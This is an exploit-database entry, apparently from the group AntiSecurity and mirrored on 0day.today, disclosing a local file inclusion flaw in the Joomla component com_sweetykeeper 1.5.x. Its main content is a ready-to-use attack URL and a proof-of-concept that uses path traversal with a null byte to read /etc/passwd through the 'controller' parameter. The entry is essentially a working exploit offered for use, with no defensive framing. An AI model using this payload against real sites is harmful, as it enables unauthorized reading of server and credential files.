id: 11740
date: 04/12/2010
title: Joomla com_sweetykeeper Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

==========================================================
Joomla com_sweetykeeper Local File Inclusion Vulnerability
==========================================================

==================================================================================================================
 
 
  [o] Joomla Component Sweetykeeper Local File Inclusion Vulnerability
  
       Software : com_sweetykeeper version 1.5.x
       Vendor   : http://www.joomlacorner.com/
       Download : http://joomlacode.org/gf/project/thai/frs/?action=FrsReleaseView&release_id=9191
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
==================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_sweetykeeper&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
 
 
==================================================================================================================



#  0day.today [2023-03-26]  #